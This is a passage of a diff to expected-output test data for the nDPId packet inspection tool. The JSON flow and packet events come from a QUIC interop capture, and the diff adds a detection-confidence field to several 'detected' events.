JmIj9ISqcpplInrkBzayKhF83lHHurhCA1lrKNlSdpeepOLCf\/jMxhKTDSGOt6PuvUNMjvuJNj7JdWjB1qgt+7yg6GfadVoLlc7oKEmP2EZkbg1reAwAQOQU0SIVyNqN7R8++hQVFb9WO4t2FPgkjCkOeg8PKyC0+NKn6ths3s033xQ7XDByeP8Nn2kj5mf2ZY2gISmQLZEcrz0CUqG\/ia+5tqLKj4+\/Cndt6cFxpPnK+zzcl+5uVQbgnRXQJmrxZO\/AIu15jMIC2BXo7iG1s9T31lFVuK8ZWVw0cL8LlBKwlz8kc+VhdGPCJrGwt3wYzDhn2EetnDAIMnbnceC6ASm4ceWPn7zfseGSdZHnqg2ItW2chn2XlcQp4yI6MIqqKBep7wjkYIzq1Xg27JeDrqOB5eSz5nPdiU3VaODgQWCUUbg9ghrJZfwLkGvswGRALf+EzPBVkuJnFi0tcoasUB17bL2uvxmMJsQHWFO1QguLm7aeVi4DCA7LeprVfnREJzlwtTcq1k5DYJjUcopXIzceZ1RbGyvZp4+Cg3kMpFGVYKly62GUic6\/xL1lutLalr\/JjiJp45zRjU0jch7XG6sx+An4xZJK0US\/g0Kv\/HVtYynUrwZXu\/woHqvI9+NK8siaNZbHMUKRkIGOXCg9aT\/yvWLUSR9BuvtiEH\/8yVs7NtMMrdgpTQTivJT44BZN6SO0WXldGZUkYPP9OVZchj36EQYpACosyteNK+R\/3v7MWWO4pEsgkp64XBxw2OWJLRgsbR2Yz5fH7LkIbs0gEHDj7\/gcfuV5kb5ePRim1rmsSUQI+hvJlOF3Hyyb3A9HUl2d7fhX4v+4KZA=="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1603816434848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1603816434848,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3DrxAAOER4SQocL88wKgBgBFS0h8AI+oo4AAAAAAACHAbjQjU2gF9\/wAAIP8AAB2a+srq"}
 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":120000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1603816434855,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1603816434855,"pkt":"pJGxgjQ5PKn0qB\/sCABFwABTzwsAAEABAQrAqAGAKHC\/PAMDpwYAAAAARQAANz5UQADiEbCMKHC\/PMCoAYARUbXwACMeH\/IAAAAAAAhSHVi6EOpzIP8AACD\/AAAdujqKGg=="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":120000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","ndpi": {"proto":"ICMP.Azure","breed":"Acceptable","category":"Network"},"entropy":4.724892}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434855,"flow_last_seen":1603816434855,"flow_idle_time":120000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1603816434855,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.724892}
 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1603816434858,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434858,"pkt":"pJGxgjQ5PKn0qB\/sht1gAxFJBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUr3wRUgTYu\/LHCgoKCgi+3m+0woW7wAAARL7GquBTGstjJfkM0HNCxgIAREBilxluQhOJlSo3RAJ3sT9YPO\/sQIsdu3\/IepBfUNrpFqupXs61nKnqxJbpzxm4pP4Uet+yqKBfL+M5sZl9PAH7Jj\/GqWj5hATKgnFlarPfqBSj9ebDuM9wxcuFyTqW04DSxk68M1O0uEKdC3hX6Nasxll7WkuCJBNdHdhbRwkrTxC93fxA7Bo+1ttTS+SluGuitxn3q\/f1rhqU3Rtof6iLtaCMP0POUaELPjXeochFM+KP8w+TYjbP1UR+98l3xiMRsa7Boz\/Qn6\/B9lV05gqwE+V+ndrFgiC6SU2W1mGV5dAwfiTvH0i+sGYWDheOhTxFh6v8dwHFK7yfV+qBRnmZIuILrC0ZVc8DVJxRZ00C\/VbecBGOpvKklKxAhnnr4FaiLAx4of\/xkA7t65SFTPGeySaODDta0iajRz3Okg02VlMpJCp4MYtxYVLkYQJvT4qBY\/Q3SYLhujBzrXGbyPfARPZmwKI+Y09++2g8fVjcnUT7cUy2MYcUv3gS8YX693nsVG9GuYuD1Tpc8V\/QW\/ws803NpuGE0fKAOcl7K0x276q2yxhP4KOxhUYk5nzfMGdKYR8tOed7SIHx6I89XxqDLNj\/yeFLjKcS4vphg1MO3ZXRhQu5dGqvsBgmNLF0BLZQE2exAkHM5YlM2d+2Cf5jNJkQmQN96lH4hYOcq+3cMuM0nA85Rh1rVe7urpKa+zhkSNys+oQxwrcKrhB1E8ov6Ir8fjnl9I+CB2E1uCIrXxRxtwOS4nAygc4OHQ9E8aOsj2\/w2X7PRaEwVsM1LrOKeZdUF3LQvTK2DdFbDcrW178BHsEuvh0b\/WIkKQOYUw7iOzrs1SVYgZoQ968zdkRsGSxVafnB0RpYxFcTvGFDKuA6adIdu87Np0MEASWmobXOe+0750NQu\/52K496y+JfUKhL9v1vUZoJcxA4fRjfC7Bh08mLSoPcW2iuYUY5Qfwalz27W5Ykaj0l4a4+FKTTpRfNlIedHfrTqbsQ6rbIQr8tJ+81mqHbG9Zyr8zA2muAME8q9aJsgu+U1HLzCGfWgvZFEV2EknFvEylSdE1r8PywLZ7inFg9hamDgdP5uitPIq1K8RDkjORQoXcwTc3g4iux2RI7AaBEJ4aQ64IImqf2vmsA7Hm9gV4zbJ5GdvI+BL7kLlAKNgqCno4ViE2PY+dAn7DOvAESo8acbeQESQp7Rk3XM18OTLnXB+4WbgD8q7fXA+ECTUMkpHSzm+lB\/4uh\/yExcfDM5gQRfvC\/spXzxuIqVWl2moJyhaC686aJ4KP\/t4qLF+0UIdSblurMexwFEcHDduM5IRHawmbrUFCfEQ+n4o\/SryqiP6om0IN1nAFm1ylhTzYdhrqGwZGRimjSXQBGvHoRTYsAlUs8s7gIQ9BZOAZT5zXBTy9plxFRn0xuOTisgPDNearpDgC37gTQLBm56fc\/xKHrVFHO5kMHOj6NVCppn2SoJ6\/fLiZL3tw3F0wrYIRE9J7EJb3sJ1aGsgL3pCgWOt7Qvk25++jdWqnsAR14C4ICoJzYNOJ6kjejpAxjuQX8JcLxcnqs2SWXAF1o2jEryGZfGoV3+v\/u2H1\/3a+NF9jJ5g=="}
 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1603816434861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"ts_msec":1603816434861,"pkt":"PKn0qB\/spJGxgjQ5ht1gCRGvACsRNCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9EVHblQArGxDIAAAAAAAI\/VKHHlPIokDaehpK\/wAAHf8AAB7\/AAAf\/wAAIA=="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1603816434871,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"ts_msec":1603816434871,"pkt":"PKn0qB\/spJGxgjQ5CABFAAAvPS1AACoRkCmM4zRcwKgBgAG7k5gAGycshAAAAAAACPBGL7QnI4n3\/wAAHQ=="}
@@ -278,7 +278,7 @@
 02138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1603816434880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434880,"pkt":"pJGxgjQ5PKn0qB\/sht1gAgKbBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmo4ERUgTY5TrBCgoKCghziEmCXfFrHwAARL5LtYR3ejPf\/p3z4CC05PowI2I8\/yhShfm5nPX+w2RMm09Epp7xl+kBRRhqGjOWMvDuvKtjnCZP4h43yInAnyoQy6CqAqM2X0CJjYqFRLzhwJbIqw2DVbxOowFB4MPGm0ZSauJhv35hdaMdrkpEWiZjZxAcIt9QXdAe3ei5ci4QFJrTlck2vWOijZIoEgmR7v8f3b2ShmI6CdJBBEhbx7x+xdhmvF7QyLqpOKHrLTEfG+pOv4\/x0hdm8B4rKN9lYhLlGSoGddMbooBzzRUA7p16+7rbjImGPkS1MotpttG8+odH6+SDLBY+X3GstYZ1FO\/bzamHEZxYZMgP1ghrma\/s7dEMtCivJ8V9DDtANnntchI6kgniK9bzzOeDCsdM9ITRIlN2z\/Af3okU9roB71yq\/9DX\/TdkJvaU2WO+UeMMmr8r9mAF+UKfPefAvtmM4XpTI7S0sOggW9+ylbRk868BabyiGaalY7v6ElyxYQX5Lm+7f22jDAR\/1Rxw+pqMGJoYSAUT0vcKEq7ImLo5wdD1HbPPsQSmOUj6sUs4CO\/fnKY8anJpGjgDy0aXUYk8jHpkks0Ogglg+nRuCH++j5UW1f7ZAEpNa9vxdlT60Esd66TkVHOw+4sOrTBkOSin7f9JufqnL0\/oha9fVnFNoEifDQokis3kLSU3qOhha5NehjGyqXC4mPnsRXhV1FSJLx2VGefOAKopFDtlBUj77lmzpE4bT3pVw7XDcnU98fJgVGUI0JycRmnYXeBdfKKKe\/C3yD3TJtdWJpUxFWlLU5JBLw1DK7Jaeoa2CHR+Mm+Uos1NDX1p\/Tae7YJ3QTohWBSmBEM8sQU24dwTVN4u9NduhdNUw4abqXZHWWatpGkhOGi+ztCmJQyFuKmz76ia0aYCpdIQEteOm4a+0nCcqQW98i\/PWMOzXN5N4iJBlj7Z1kEIRjKqOh15d3MSiivlm0kY3uvwpzNG6z\/mG64H\/Ch0ZjLDFL0Lh7Mq4u7sR0TzJNJGk7sVaiEPpK8iv5ewweeTFC5Rl0GpKG2cTtrRDh3Jlv0fDheeAqwjrpXOD7ekCHhXvPoBEqPIW59s0aKn33+\/B+x4kneJZP\/w76GqJhpArO5oYmd2nyPv2SM++J5j4el8Gz8DMsGeqEBtxHDWRjkM1rYAvTzN5xb8x5DuFADLFqHlRDraOgEM0xdsEf3hQUK7mhuUCaQGZBsNRdHnNvZL2CgICOnYLx\/yP6eBn+tj4fdyypHuoUxCV0l91OyAz1zzMppQmM\/MZw4IjgKddLGGzkfD9eH5L2StADzoe\/+tl+Vy4q2cConEMFDs6PaRjEIki+cwlbYxOX5IGAOH+nU45b+AhHH3CTnzqcfB1hVJ27u+6GOUu8zMsLgjDTrc3Bi318\/NgqlATYv79utqKeVxozT3TLQMpSZijN7B8+4KqJeZKEmn2cSaCzlZY7LsE5mGMSEER6hyX0D9p3bjlWs1ZL9V6nrrfHoSzPveONxywVsTghmtxCvne0EGPCkAlJjIUsDS0C0WhRU05kFBDzqpkLuoJAtfN6wRz1A7m00svwCrcx6jydEIcQPaUg5llHIZhpOg+oB895RjVpCjMpMpvctTtfDIJJw1H3cf+g=="}
 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 01185{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1603816434886,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434886,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAYQkAAC0BE6WF8s70wKgBgAMDPAcAAAAARQAFAILLQAApEbMSwKgBgIXyzvS\/\/xFRBOzO1McKCgoKCBW0hlcD4wtQAABE0o5ETsyCKfAiv3GjrhWWAHytWjhKjuCcE8PQ+8\/rlGyAU8f1x+Mk3FCdRieZy\/gIKc\/JJBqsu6Id+Y5I6UUEss09jcswdjUwYmczoGMjYqPo0TgEgq07LxXN2ezzpPgN8+p4f8xWtCxwb8JafjHIFjRWKZy5A\/ktd7oDLtros16gjzk4ANxurCLBEjXn1mc4A1OkxNBYnuq2VBy6bBpOv61yDRD8YC\/\/cKt+DeKlIab2wioxKuuqTJaa6bcvjsxaGxss1fmXynI35PYXkvPyrb+OmmsPeoZV51Hz2RzGwPglrJrYbrEQT\/ivLiFpZ023Tc\/UX5\/6yEdVpklz8RpLexVa6Bn2z1jbV1c+PvjbnEyP4B3XT1q2R1U8Zg+Hg2foBKQpPal7OLyEEZLoYQ0+yrbDuTkJcdCxkssUJpGttMtaDpOYAt3rqklkL5jPHrEd1C+FSNb\/c7TK\/C4zJ9DojLveQhKMASAjgDcBaayNHzmzBxrLpcHuZ77JWq9eQca55sxDzWYh2vyNpayRp3s936eLgTzDYJED3HFsEu7Un7VVKrpKCJGjDAw7oK0mEPfQD9p25UX36n9yQOALJibj1tF+6rPwcqd1enHsqJO2F24HI5WHL0GiGGP5cRaXpNzZ+ijbLCxtX7NKJN8+IHswHT8wg8Yb1lU="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.612374}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434886,"flow_last_seen":1603816434886,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434886,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.612374}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1603816434890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1603816434890,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3dApAADIRazjK7txcwKgBgAG7mBUAI5npkwAAAAAACEmkvxz+BSBNGio6Sv8AACD\/AAAd"}
 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1603816434894,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434894,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwXZAAEARa1\/AqAGAilu8k6XkEVEE7KGrwQoKCgoIR0aH1pvahxkAAETSKZaHE9N9GtJMYvv9ifpVeuysckzKOAoBynmJqbZIyXXd6Q0OaiDA1+eXkNpoukJH66d1qZWl2up+oJkJlE2iNPjRL4rTXi4tGFWkOc7OU1ijBfm7sZPOTclysKOTLlG\/wLwmM+4bmiv8t1VJI8ny49KjxXkbGme9dgA0bkSUFasSUnlJAUa50AK97fShfQXzqeK5Dg+WXkJ5xuGOQHrunpIaEPTkH8dZAQC0kgGeFDv4HG0pqkwbzV+IYkH7SmFammklwji5+p3TbOylB01wJbffLThybxWnDqogivkmpQmkVpMhBwMu\/9xKEoVlmIM6B4v9QOFFHqhSd9Fs3q++BMu\/YhweSpnGUx72yfkjBJM\/IRzi1GX4pw11eJz1\/3qBdeWldk+sRUQcox4In2qe+wuxVw2osgoNlI9YvrG4D8P\/zIyWUtdNaLtHhPMgDgiAC91NDmgmJENXcA\/RXPQYvhOdBOfaMfqQoVoSR7Q4FTIccfFsCF+5xHFnMAndfXwOCyIdbeaeIVCpMSQ3bCvvDIsU716Wq\/5J449XPD5T8+ox9fqnlN0Jxyqab0XJ72k9txuNkHNYBZFINRTioCXl6izgIEtcruHCYZt+ILtV2gUUjuR8FtecwJtSSrY5wTZrfp6mz9U9VqFe6kCmkDBYZVE9CTSh5jPIMshdFPvlPyb9jOL5Oce8EEmxF50G+MImURL0E5jw4S6VFP1JWS9s3SOl2ok90TOvvWFQkYQVIGjzaMpXtyBqGjbtpCnFbad8ojifR\/YqGipZKY7YjkWGjouJV\/EDirr0Js9ZOS2bLt0d5OKTRnFRrYMUX7KY8zvzFslodkxSsLJ9F5kbgxZelMuuAZS\/WjzvvYQWm+fu6fqiOFgxzt4cf5I3rtZr1vhb\/mlhSZdfx+5dh2+Bw05\/c+ZhZcGWQVWlIJoLVTK8wVhhxCprdVxcD8azYdyGHI2yjdhdg8y5T1SHS+wMUv3TrTEkgaPMJSS\/bG830bq4zk9YF1gPTLVzdsj3uGV0Cb2GuAxyajIFBjWG43Q+tx8KNtdSeW621EE8H3LtU5Co2FzEFLWry1aFgbJB2zQ2iUthr7o+cxvl+I9ObWsbtyiFbbosM9ubsa940D830mP6uzArtiDHR\/\/tFLOFL88JLiryCWee0dBawNwyN0l3KoWaf0+xrkvJmDrQtP2edAcztmf7vS5YtS7p+DLQu7CH9K63Utaw3a3fUEMW7mKw5KR+OTvLaDXf+fl5pRlYNEqDRWXH4I909g6Vz4OrKab3fRk6tpbyc6YOZkWMRgcj4QWKv9Jjdy\/GO0VWic\/I9O\/C9pHvyAImGRQQ3Dlm9KvoTkJ8oWVAyBE0qeiaF6eLmq95FTaIvn+MgWKZGoMFAxQpObBG41iLXc68P\/q28rKfRP2cjjT0E2a5yH6RR4ZhTZalehf32S79m5P3+jb7+Xyy8XIUQjKRHLykyRjpXm2fvzGkfd\/uvjbx1WH97nbN6TLHvxcWmIC9p8hr1ew6jGo88bbJUcg867GJeVKG4nDMxlqcviS+1Hf8Ar25WRbo1aTF5rpBjU67mAtQodxvng7drgHRjfXYl0zhU6OqWR+vayEfq8beOLohWXa2bFgOH+TtDLfzLUWOS7634STReD98JKgMwA=="}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1603816434897,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1603816434897,"pkt":"PKn0qB\/spJGxgjQ5ht1gCwDeACMRMCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9EVHPlAAjX2HlAAAAAAAIQNHw6Rif2eH\/AAAd\/wAAGxoqOko="}
@@ -298,7 +298,7 @@
 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1603816435011,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":145,"pkt_l4_len":91,"ts_msec":1603816435011,"pkt":"pJGxgjQ5PKn0qB\/sht1gCTD0AFs6QCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUAQQRVgAAAABgCRGvACsRNCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9EVHblQArPxCkAAAAAAAI\/VKHHlPIokDaehpK\/wAAHf8AAB7\/AAAf\/wAAIA=="}
 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":120000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1603816435020,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1603816435020,"pkt":"pJGxgjQ5PKn0qB\/sCABFwABLWwEAAEABm4nAqAGAjOM0XAMDgJEAAAAARQAALz1HQAAqEZAPjOM0XMCoAYABu5OYABvoK8MAAAAAAAjwRi+0JyOJ9\/8AAB0="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":120000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.659827}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816435020,"flow_last_seen":1603816435020,"flow_idle_time":120000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1603816435020,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.659827}
 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1603816435020,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816435020,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAaXxAAEARbePAqAGAg58YxobPAbsE7CCRywoKCgoIJv2XczUh4RIAAETSbCxdVvXUX9XjSdEekuKYBaaXvtdleeAoC7w0t1zysEAi8tmmk\/irguMUfevsR+4Ix3ykT3XI5ywdd9iZ2jEEpXdKcBNTILwVo9RsE2t9EwWhoq5\/2T\/d0RKrFr8WtXqw8R81Lc9NfiQcl+03MG9MvRdcSultVc\/J1\/ZsUKnUEchEiSxzxC+Bh9AJTZqdlAjdxHnzTMm8xi3GQm6bMwAMTxvoRcjoGFuP\/jsOpyTpax0np5jI5wvAneUYSZi\/TgHF\/m8zKEHvyg7GMb3qHu7n\/RSycakCUo6vcofHTkxeQVCCRngbPUJ9tSzw1NtS2gM31yeDwbXURmAo9cCWFob2vDSUwjpS5E4Bzmlgq4msvVlsTMrZEpAhNoUHdjHy4QjtukGArqr5ysTKErAC4Awr5rI3yHlLGqm+45AjHIVXYBIC02L4V+2\/NakDwhKYWvsC8fxBwr7XFo9wng0iEMUuvvwpf3rRyeyquDhJCKiPgZqbE4vibuLP3YjbRmkwnzwoxp4JbGmV6sCYODAB+6uR9yWT2DvYh2Rb\/rOtm0wd1MTHRHgjq65\/Q9ZAV73R3b3X9eYSSjZWx+KotHN704t02EkkPjksNKXNye16bccDD5IXgwJUTDiyc6d0LRseUDRuGQDw0kuZ+ll0kG2i4WlqtUdTnp8918DucjmW2VDKzNjeIA39VHQWqziQ1ddqPEX2hN++O4sXWiPb63hxUkBl\/1utZAUStyF7eS3pGlLVhZF\/znUUZa3M+0DGGywvSBI2oj4pSimzVz7N20pvszlriqxtYYleocY\/YE3jUUemgCpo75mWgtJOBRyLbyK9A6hraxh7Olf0MRas13AcLep+ICMnSJfWbjp\/GkdnPkR\/C5xIcrNwENdzdFsACnHqaoD2O6863JhZYdMEnWVSkYIq+Qo3evifk+os89mbDYj7FZGfwtqfdt3rABEss73A7ji44N9TcuujgLAvCHsKuJvwI7zuwPeUe9hxI\/RPeoFnolmIFjlDPLJQoIkxVdnaINbjrLTY2LfZda6\/LCv8sM\/bd\/AmWDDDh73GxJl1z703OS5uL1l7MQlkB\/g4ilEAjMQXXXHecuH\/deyjep8GWLhkSiTJ4HHr+05f4SIdPiicarLt9LEk2eLRpP+UFPHooao1g8mjZx0KcuHnQr0iaMhZmOeSp7JakH1ow9hqHE6Ef3Xm3Pc4cZx4QtZl7vmWkwcxpbDzsE83GDarD6V2tKvmXQhxD9\/w2J7v63jI+9Lb+ZNkqXvr7OsDvbbvf2VuKSQhAY47DGEam5DlA7ysmY73v2mnyh5eWPe3e\/N+mJaLUlQ6UUxA2gOWmJj17O3Q2\/OSuoxzzA\/RzjfOOrzblYj\/gviQOtnjWavb6c7C2hqIBHAiEqk9l7GIM9LKnUeZw2+IvAmVQbKf1z8qvly8H0RJkDAyVeMEDY4Oueq1xKRIhCACrJcwvC8lIz\/kBgPhANKqur60SDXAg6fF5Jr+WTWixT3BBTygw1VtL5D2yCH07\/ZeeZ6+sIIJRb0PchDdQH+b86Sz3C6rgJrYhidtZTL8xu0okPJOirpfLuxNgzMoFYlSLzK2q+LfyeGhBlFnlOErJr7Z3kyibZ8CPOcYiSJxmJmJS2Sz\/7dQIIdrxSXIOJ44rg=="}
